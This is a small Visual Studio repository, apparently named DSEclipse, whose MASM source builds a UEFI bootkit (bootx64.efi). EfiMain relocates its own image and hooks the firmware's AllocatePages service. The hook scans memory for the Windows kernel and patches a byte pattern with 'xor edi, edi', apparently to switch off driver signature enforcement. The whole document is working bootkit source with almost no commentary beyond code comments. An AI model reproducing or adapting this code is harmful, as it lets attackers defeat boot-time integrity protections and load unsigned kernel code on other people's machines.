├── Bootkit
    ├── GeneralTable.asm
    ├── AllocatePagesHook.asm
    ├── EfiMain.asm
    └── Bootkit.vcxproj
└── DSEclipse.sln


/Bootkit/GeneralTable.asm:
--------------------------------------------------------------------------------
 1 | .CODE
 2 | 
 3 | ALIGN 1
 4 | 
 5 | PUBLIC BootServices
 6 | BootServices     QWORD 0
 7 | 
 8 | PUBLIC AllocBase
 9 | AllocBase        QWORD 0
10 | 
11 | PUBLIC ImageBase
12 | ImageBase        QWORD 0
13 | 
14 | PUBLIC ImageSize
15 | ImageSize        QWORD 0
16 | 
17 | PUBLIC ImagePages
18 | ImagePages       QWORD 0
19 | 
20 | PUBLIC AllocatePages
21 | AllocatePages    QWORD 0
22 | 
23 | END


--------------------------------------------------------------------------------
/DSEclipse.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.12.35521.163
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bootkit", "Bootkit\Bootkit.vcxproj", "{DF325AB7-67A6-473E-93FF-16955AFBC063}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Release|x64 = Release|x64
11 | 	EndGlobalSection
12 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 | 		{DF325AB7-67A6-473E-93FF-16955AFBC063}.Release|x64.ActiveCfg = Release|x64
14 | 		{DF325AB7-67A6-473E-93FF-16955AFBC063}.Release|x64.Build.0 = Release|x64
15 | 	EndGlobalSection
16 | 	GlobalSection(SolutionProperties) = preSolution
17 | 		HideSolutionNode = FALSE
18 | 	EndGlobalSection
19 | 	GlobalSection(ExtensibilityGlobals) = postSolution
20 | 		SolutionGuid = {C97F8BC8-7D66-4418-A908-DBA353722551}
21 | 	EndGlobalSection
22 | EndGlobal
23 | 


--------------------------------------------------------------------------------
/Bootkit/AllocatePagesHook.asm:
--------------------------------------------------------------------------------
  1 | .CODE
  2 | 
  3 | ALIGN 1
  4 | 
  5 | EXTERN AllocatePages:QWORD
  6 | EXTERN BootServices:QWORD
  7 | 
  8 | PUBLIC AllocatePagesHook
  9 | 
 10 | ;
 11 | ; Purpose:
 12 | ;
 13 | ;   Hook routine for AllocatePages.
 14 | ;   Scans memory on every call to find OS kernel.
 15 | ;   Once found, searches for a pattern and applies a patch.
 16 | ;
 17 | AllocatePagesHook PROC
 18 | 	; Save arguments
 19 |     push    rcx
 20 | 	push    rdx
 21 | 	push    r8
 22 | 	push    r9
 23 | 
 24 |     ; Set start address to first 2MB page 
 25 | 	mov     rax, 0200000h
 26 | 
 27 | next_page:
 28 |     ; Is scan reached limit?
 29 |     cmp     rax, 010000000h
 30 |     ; Yes? Go to finish
 31 |     jae     finish
 32 |     
 33 |     ; Have we reached some image?
 34 |     cmp     word ptr [rax], 5A4Dh
 35 |     ; Yes? Go to found dos
 36 |     je      found_image         
 37 | 
 38 | next_iter:
 39 |     ; Step to the next 2MB page
 40 |     add     rax, 0200000h
 41 |     jmp     next_page
 42 | 
 43 | found_image:
 44 |     ; Get NT headers
 45 |     mov     ecx, dword ptr [rax+3Ch]
 46 |     mov     rdx, rax
 47 |     add     rdx, rcx
 48 | 
 49 | found_pe:
 50 |     ; rax = base address
 51 |     ; rdx = NT headers
 52 | 
 53 |     ; Get Export Directory 
 54 |     add     rdx, 018h
 55 |     mov     ecx, [rdx+070h]
 56 |     ; Does export directory exist?
 57 |     test    ecx, ecx
 58 |     ; No? Not our target, skip
 59 |     jz      next_iter
 60 | 
 61 |     ; Calculate Export Directory address
 62 |     add     rcx, rax
 63 |     ; Get Name string relative address
 64 |     mov     edx, [rcx+0Ch]
 65 |     ; Get Name string address
 66 |     add     rdx, rax
 67 |     ; Read first 4 bytes of Name string
 68 |     mov     r8d, [rdx]
 69 |     ; Does it starts with 'ntos' LE?
 70 |     cmp     r8d, 0736F746Eh
 71 |     ; No? It's not our target, skip
 72 |     jne     next_iter
 73 | 
 74 | found_ntoskrnl:
 75 |     ; Is it our pattern?
 76 |     cmp     byte ptr [rax], 74h
 77 |     jnz     next
 78 |     cmp     byte ptr [rax+1], 2
 79 |     jnz     next
 80 |     cmp     byte ptr [rax+2], 8Bh
 81 |     jnz     next
 82 |     cmp     byte ptr [rax+3], 3Ah
 83 |     ; Yes? Go to patch
 84 | 	jz      patch
 85 | 
 86 | next:
 87 | 	; Step to the next byte
 88 |     add     rax, 1           
 89 |     jmp     found_ntoskrnl
 90 | 
 91 | patch:
 92 |     ; Patch with xor edi, edi
 93 |     mov     word ptr [rax+2], 0FF31h
 94 | 
 95 | restore:
 96 |     ; Restore the hook
 97 |     mov     rcx, BootServices
 98 |     mov     rax, AllocatePages
 99 |     mov     [rcx+28h], rax
100 | 
101 | finish:
102 | 	; Restore arguments
103 | 	pop     r9
104 | 	pop     r8
105 | 	pop     rdx
106 | 	pop     rcx
107 | 
108 |     ; Jump to AllocatePages
109 | 	mov     rax, [AllocatePages]
110 | 	jmp     rax
111 | AllocatePagesHook ENDP
112 | 
113 | END
114 | 
115 | 


--------------------------------------------------------------------------------
/Bootkit/EfiMain.asm:
--------------------------------------------------------------------------------
  1 | .CODE
  2 | 
  3 | ALIGN 1
  4 | 
  5 | EXTERN AllocatePagesHook:PROC
  6 | 
  7 | EXTERN BootServices:QWORD
  8 | EXTERN ImageSize:QWORD
  9 | 
 10 | EXTERN ImagePages:QWORD
 11 | EXTERN ImageBase:QWORD
 12 | 
 13 | EXTERN AllocBase:QWORD
 14 | EXTERN AllocatePages:QWORD
 15 | 
 16 | ;
 17 | ; Purpose:
 18 | ;
 19 | ;   Entry point for DSEclipse.
 20 | ;   Copies itself as a shellcode into the newly allocated memory 
 21 | ;   region and places and inline hook on AllocatePages.
 22 | ;
 23 | EfiMain PROC
 24 |     ; rcx = ImageHandle
 25 |     ; rdx = SystemTable
 26 | 
 27 |     ; Save BootServices
 28 |     mov     rax, [rdx+60h]
 29 |     mov     BootServices, rax
 30 | 
 31 |     ; Save AllocatePages
 32 |     mov     rax, [rax+28h]
 33 |     mov     AllocatePages, rax
 34 | 
 35 |     ; Align to the start of a page
 36 |     mov     rax, EfiMain
 37 |     and     rax, 0FFFFFFFFFFFFF000h
 38 | 
 39 | find_base:
 40 |     ; Is it DOS magic?
 41 |     cmp     word ptr [rax], 5A4Dh
 42 |     ; Yes? Go to found base
 43 |     je      found_base  
 44 | 
 45 | next_iter:
 46 |     ; Decrement the page
 47 |     sub     rax, 0100h
 48 |     jmp     find_base
 49 | 
 50 | found_base:
 51 |     ; Save ImageBase
 52 |     mov     ImageBase, rax
 53 | 
 54 |     ; Go to NT headers
 55 |     mov     ecx, dword ptr [rax+3Ch]
 56 |     mov     rdx, rax
 57 |     add     rdx, rcx
 58 | 
 59 | get_image_size:
 60 |     ; Get ImageSize
 61 |     add     rdx, 018h
 62 |     mov     ecx, [rdx+038h]
 63 | 
 64 |     ; Save ImageSize
 65 |     mov     eax, ecx
 66 |     mov     ImageSize, rax
 67 | 
 68 |     ; Convert size to pages
 69 |     add     ecx, 0FFFh
 70 |     shr     ecx, 12 
 71 | 
 72 |     ; Save ImagePages
 73 |     mov     eax, ecx
 74 |     mov     ImagePages, rax
 75 | 
 76 | allocate_memory:
 77 |     ; Get AllocatePages
 78 |     mov     rcx, BootServices
 79 |     mov     r10, [rcx+28h]
 80 | 
 81 |     ; Reserving memory for address out
 82 |     sub     rsp, 8 
 83 | 
 84 |     xor     ecx, ecx            ; arg1 = AllocateAnyPages
 85 |     mov     edx, 1              ; arg2 = EfiLoaderCode
 86 |     mov     r8,  ImagePages     ; arg3 = number of pages
 87 |     lea     r9,  [rsp]          ; arg4 = pointer to physical addr out
 88 | 
 89 |     ; Call AllocatePages
 90 |     call    r10
 91 | 
 92 |     ; Get allocated memory location
 93 |     mov     rax, [rsp]
 94 | 
 95 |     ; Restore stack
 96 |     add     rsp, 8
 97 | 
 98 |     ; Save allocated memory address
 99 |     mov     AllocBase, rax
100 | 
101 | copy_image:
102 |     ; Set source
103 |     mov     rsi, ImageBase
104 |     ; Set destination
105 |     mov     rdi, AllocBase
106 |     ; Set size
107 |     mov     rcx, ImageSize
108 | 
109 | copy_loop:
110 |     ; Is copied everything?
111 |     test    rcx, rcx
112 |     ; Yes? Go to place hook
113 |     je      place_hook
114 |     
115 |     ; Load 8 bytes from source
116 |     mov     rax, [rsi]
117 |     ; Copy them to the destination
118 |     mov     [rdi], rax
119 | 
120 |     ; Move to the next 8 bytes chunk
121 |     add     rsi, 8
122 |     add     rdi, 8
123 |     sub     rcx, 8
124 |     jmp     copy_loop
125 | 
126 | place_hook:
127 |     ; Get ImageBase
128 |     mov     rax, ImageBase
129 |     ; Get AllocatePagesHook address
130 |     mov     rcx, AllocatePagesHook
131 | 
132 |     ; Calculate the relative offset to the hook function 
133 |     sub     rcx, rax
134 | 
135 |     ; Calculate the hook address in AllocBase
136 |     add     rcx, AllocBase
137 | 
138 |     ; Place a hook
139 |     mov     rax, BootServices
140 |     mov     [rax+28h], rcx
141 | 
142 | finish:
143 |     ; Return success
144 |     xor     eax, eax        ; EFI_SUCCESS == 0
145 |     ret
146 | EfiMain ENDP
147 | 
148 | END


--------------------------------------------------------------------------------
/Bootkit/Bootkit.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Release|x64">
  5 |       <Configuration>Release</Configuration>
  6 |       <Platform>x64</Platform>
  7 |     </ProjectConfiguration>
  8 |   </ItemGroup>
  9 |   <PropertyGroup Label="Globals">
 10 |     <Keyword>Win32Proj</Keyword>
 11 |     <ProjectGuid>{DF325AB7-67A6-473E-93FF-16955AFBC063}</ProjectGuid>
 12 |     <ProjectName>Bootkit</ProjectName>
 13 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 14 |   </PropertyGroup>
 15 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 16 |   <PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 17 |     <PlatformToolset>v143</PlatformToolset>
 18 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 19 |   </PropertyGroup>
 20 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 21 |   <ImportGroup Label="ExtensionSettings">
 22 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 23 |   </ImportGroup>
 24 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
 25 |   <ImportGroup Label="ExtensionTargets">
 26 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 27 |   </ImportGroup>
 28 |   <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 30 |     <LinkIncremental>false</LinkIncremental>
 31 |     <IncludePath>
 32 |     </IncludePath>
 33 |     <GenerateManifest>false</GenerateManifest>
 34 |     <TargetExt>.efi</TargetExt>
 35 |     <TargetName>bootx64</TargetName>
 36 |   </PropertyGroup>
 37 |   <ItemDefinitionGroup>
 38 |     <Link>
 39 |       <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
 40 |       <SubSystem Condition="'$(Configuration)|$(Platform)'=='Release|x64'">EFI Application</SubSystem>
 41 |       <GenerateDebugInformation Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateDebugInformation>
 42 |       <EnableCOMDATFolding Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</EnableCOMDATFolding>
 43 |       <LinkTimeCodeGeneration Condition="'$(Configuration)|$(Platform)'=='Release|x64'">UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>
 44 |       <MergeSections Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 45 |       </MergeSections>
 46 |       <EntryPointSymbol Condition="'$(Configuration)|$(Platform)'=='Release|x64'">EfiMain</EntryPointSymbol>
 47 |       <BaseAddress Condition="'$(Configuration)|$(Platform)'=='Release|x64'">0</BaseAddress>
 48 |       <Driver Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Driver</Driver>
 49 |       <IgnoreAllDefaultLibraries Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</IgnoreAllDefaultLibraries>
 50 |       <RandomizedBaseAddress Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</RandomizedBaseAddress>
 51 |       <DataExecutionPrevention Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</DataExecutionPrevention>
 52 |       <ImageHasSafeExceptionHandlers Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ImageHasSafeExceptionHandlers>
 53 |       <OptimizeReferences Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</OptimizeReferences>
 54 |       <GenerateWindowsMetadata Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateWindowsMetadata>
 55 |       <LinkErrorReporting Condition="'$(Configuration)|$(Platform)'=='Release|x64'">NoErrorReport</LinkErrorReporting>
 56 |       <AssemblyDebug Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</AssemblyDebug>
 57 |       <SectionAlignment Condition="'$(Configuration)|$(Platform)'=='Release|x64'">16 </SectionAlignment>
 58 |       <FixedBaseAddress Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</FixedBaseAddress>
 59 |       <AdditionalOptions Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/MERGE:.rdata=.text /MERGE:.data=.text /EMITPOGOPHASEINFO %(AdditionalOptions)</AdditionalOptions>
 60 |     </Link>
 61 |     <ClCompile>
 62 |       <TreatWarningAsError Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</TreatWarningAsError>
 63 |       <LanguageStandard Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Default</LanguageStandard>
 64 |       <Optimization Condition="'$(Configuration)|$(Platform)'=='Release|x64'">MinSpace</Optimization>
 65 |       <ExceptionHandling Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExceptionHandling>
 66 |       <FavorSizeOrSpeed Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Size</FavorSizeOrSpeed>
 67 |       <DebugInformationFormat Condition="'$(Configuration)|$(Platform)'=='Release|x64'">None</DebugInformationFormat>
 68 |       <StructMemberAlignment Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Default</StructMemberAlignment>
 69 |       <GuardEHContMetadata Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GuardEHContMetadata>
 70 |       <MinimalRebuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</MinimalRebuild>
 71 |       <UseFullPaths Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</UseFullPaths>
 72 |       <RuntimeLibrary Condition="'$(Configuration)|$(Platform)'=='Release|x64'">MultiThreaded</RuntimeLibrary>
 73 |       <WarningLevel Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Level4</WarningLevel>
 74 |       <MultiProcessorCompilation Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</MultiProcessorCompilation>
 75 |       <InlineFunctionExpansion Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AnySuitable</InlineFunctionExpansion>
 76 |       <OmitFramePointers Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</OmitFramePointers>
 77 |       <StringPooling Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</StringPooling>
 78 |       <BufferSecurityCheck Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</BufferSecurityCheck>
 79 |       <ControlFlowGuard Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ControlFlowGuard>
 80 |       <FunctionLevelLinking Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</FunctionLevelLinking>
 81 |       <RuntimeTypeInfo Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</RuntimeTypeInfo>
 82 |       <CallingConvention Condition="'$(Configuration)|$(Platform)'=='Release|x64'">FastCall</CallingConvention>
 83 |       <FloatingPointExceptions Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</FloatingPointExceptions>
 84 |       <WholeProgramOptimization Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</WholeProgramOptimization>
 85 |       <SDLCheck Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</SDLCheck>
 86 |       <EnableFiberSafeOptimizations Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</EnableFiberSafeOptimizations>
 87 |     </ClCompile>
 88 |     <PostBuildEvent>
 89 |       <Command Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 90 |       </Command>
 91 |     </PostBuildEvent>
 92 |     <MASM>
 93 |       <NoLogo Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</NoLogo>
 94 |     </MASM>
 95 |     <MASM>
 96 |       <GenerateDebugInformation Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateDebugInformation>
 97 |       <AdditionalOptions Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/Zf %(AdditionalOptions)</AdditionalOptions>
 98 |       <UseSafeExceptionHandlers Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</UseSafeExceptionHandlers>
 99 |     </MASM>
100 |   </ItemDefinitionGroup>
101 |   <ItemGroup>
102 |     <MASM Include="AllocatePagesHook.asm" />
103 |     <MASM Include="EfiMain.asm" />
104 |     <MASM Include="GeneralTable.asm" />
105 |   </ItemGroup>
106 | </Project>


--------------------------------------------------------------------------------